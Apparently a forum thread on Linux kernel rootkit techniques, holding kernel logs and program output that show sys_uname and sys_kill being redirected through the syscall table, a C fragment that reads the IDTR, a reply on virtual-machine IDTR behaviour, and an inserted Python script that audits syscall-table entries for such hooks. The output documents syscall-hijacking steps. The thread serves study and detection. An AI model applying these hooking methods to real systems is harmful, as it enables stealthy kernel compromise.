Sep 24 19:06:49 localhost kernel: intercept: function:get_sys_call_table-L220: sys_call_table at 0xc11f14e0, call dispatch at 0xcebeceaa
Sep 24 19:06:49 localhost kernel: intercept: function:intercept_init-L276: sys call table address c11f14e0
Sep 24 19:06:50 localhost kernel: intercept: function:new_open-L234: hello
Sep 24 19:07:00 localhost last message repeated 460 times
idtr base at 0xC036C000
idt80: flags=EF sel=60 off=C010388C
sys_call_table at 0xc02bfaa0, call dispatch at 0xbf8debae
addr(__kmalloc): c0171d25
kmalloc: 0xc0171d25
Old sys_uname: 0xc012df46
off: 0xc02bfc88
write: 4
Now sys_uname: 0xc0171d25
off: 0xc02bfc88
write: 4
Kernel Space allocation: 0xf6d12440
Write Kill Opcode To Kernel Buf.
addr(u per_cpu__current_task): c03b4000
addr(sys_kill): c012ba45
off: 0xf6d12440
write: 85
Write Opcode Successed!
off: 0xc02bfb34
write: 4
hijack sys_kill from 0xc012ba45[-1072514491] to 0xf6d12440[-154065856]
###NOTES to recovery sys_kill.
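The output above records two syscall-table entries being redirected: sys_uname to the address of __kmalloc (still inside the core kernel's text) and sys_kill to a freshly allocated kernel buffer at 0xf6d12440 (outside it). A defender auditing such a box would compare the live table against a System.map-style baseline and classify where each changed entry now points. The following script is an added illustration of that check, not code from the thread; it parses the lines quoted on this page as constructed input, and the kernel-text window and the baseline values are assumptions taken from the addresses printed above, not from a real System.map.

```python
import re

# Constructed sample: lines copied from the program output quoted on this page.
SAMPLE_OUTPUT = """\
Old sys_uname: 0xc012df46
Now sys_uname: 0xc0171d25
addr(sys_kill): c012ba45
hijack sys_kill from 0xc012ba45[-1072514491] to 0xf6d12440[-154065856]
"""

# Assumed core-kernel text window for this 32-bit layout. The page only shows
# that sys_kill and __kmalloc live around 0xc012.../0xc017... and that the
# hijack target came from a kernel-space allocation, so these bounds are a guess.
KERNEL_TEXT_START = 0xC0100000
KERNEL_TEXT_END = 0xC0300000

# Baseline handlers, as a System.map or a clean boot would record them.
# Values are the "Old"/"addr()" numbers printed on the page (assumed baseline).
EXPECTED = {"sys_uname": 0xC012DF46, "sys_kill": 0xC012BA45}

HIJACK_RE = re.compile(r"hijack (\w+) from 0x([0-9a-f]+)\S* to 0x([0-9a-f]+)")
NOW_RE = re.compile(r"Now (\w+): 0x([0-9a-f]+)")


def in_kernel_text(addr):
    """True when addr falls inside the assumed core-kernel text window."""
    return KERNEL_TEXT_START <= addr < KERNEL_TEXT_END


def classify(current, expected):
    """Label a table entry relative to its baseline value."""
    if expected is None:
        return "no-baseline"
    if current == expected:
        return "ok"
    if in_kernel_text(current):
        # Entry now points at some other core-kernel function (e.g. __kmalloc).
        return "redirected-in-text"
    # Entry points into module, vmalloc or heap memory: classic hook.
    return "redirected-out-of-text"


def current_handlers(text):
    """Extract the latest observed handler address per syscall from the output."""
    handlers = {}
    for line in text.splitlines():
        m = HIJACK_RE.search(line)
        if m:
            handlers[m.group(1)] = int(m.group(3), 16)
            continue
        m = NOW_RE.search(line)
        if m:
            handlers[m.group(1)] = int(m.group(2), 16)
    return handlers


def audit(text, expected=EXPECTED):
    """Return {syscall: verdict} for every handler seen in the output."""
    return {name: classify(addr, expected.get(name))
            for name, addr in current_handlers(text).items()}


if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_OUTPUT).items():
        print(f"{name}: {verdict}")
```

On a live system the same classification would be driven by reading the syscall table through a trusted channel (a kernel module or a memory image) and by the real text bounds from System.map; the point of the split between "redirected-in-text" and "redirected-out-of-text" is that a pointer into module or vmalloc memory is almost never legitimate for a core syscall, while a pointer to another core-kernel symbol still deserves a look but can also be a kernel patch or ftrace trampoline.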
debian-wangyao:/home/wangyao/Documents/Reports/rootkit_report/0802/code/others/print_sys_call_table# tail /var/log/kern.log
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431383] CPU1 attaching NULL sched-domain.
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] CPU0 attaching sched-domain:
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] domain 0: span 0-1
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] groups: 0 1
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] CPU1 attaching sched-domain:
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] domain 0: span 0-1
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] groups: 1 0
Oct 20 10:02:27 debian-wangyao kernel: [ 252.056927] system_call: 0xc010388c
Oct 20 10:02:27 debian-wangyao kernel: [ 252.056927] Here Find sys_call_table: 0xc01038ca
Oct 20 10:02:27 debian-wangyao kernel: [ 252.056927] sys_call_table: 0xc02bfaa0
[root@localhost misc-progs]# ./a.out
idtr base at 0xFFC18000, limit at 0x7FF
idt80: flags=0 sel=0 off=0
readkmem: mmap: Input/output error
Segmentation fault
[root@localhost misc-progs]#
Oct 20 10:18:41 localhost kernel: syscall intercept: Hi, poor linux!
Oct 20 10:18:41 localhost kernel: intercept: function:get_sys_call_table-L196: idtr base at 0xC12B2000, limit at 0x7FF
Oct 20 10:18:41 localhost kernel: intercept: function:get_sys_call_table-L204: idt80: flags=EF sel=60 off=C1003CC4
Oct 20 10:18:41 localhost kernel: intercept: function:get_sys_call_table-L220: sys_call_table at 0xc11f14e0, call dispatch at 0xc3eadeaa
Oct 20 10:18:41 localhost kernel: intercept: function:intercept_init-L276: sys call table address c11f14e0
Oct 20 10:18:41 localhost kernel: intercept: function:new_open-L234: call open()
Oct 20 10:18:45 localhost last message repeated 19 times
Oct 20 10:18:45 localhost kernel: syscall intercept: bye, poor linux!
#include <stdio.h>

#define CALLOFF 100 /* bytes of system_call to scan; assumed value, the original macro is not shown */

/* IDTR as stored by sidt on 32-bit x86: 16-bit limit followed by 32-bit base */
struct {
    unsigned short limit;
    unsigned int base;
} __attribute__((packed)) idtr;

int main (int argc, char **argv)
{
    unsigned sys_call_off;
    int kmem_fd; /* /dev/kmem file descriptor */
    unsigned sct;
    char sc_asm[CALLOFF],*p;
    /* read the IDTR register */
    asm ("sidt %0" : "=m" (idtr));
    printf("idtr base at 0x%X\n",(int)idtr.base);
    return 0;
}
Original post by CUDev, 2009-10-20 10:37:
That's not quite right either; try the /dev/kmem code in
http://blog.chinaunix.net/u/12592/showart_1421096.html
instead.
BTW: what is your test environment?
In most virtual machines the IDTR cannot be read correctly. Because lidt is a privileged instruction, it raises an exception that is caught by the VM, which lets the VM maintain a virtual IDTR for each guest operating system. Since sidt is not handled, it returns a fake IDTR address, usually greater than 0xFFC00000.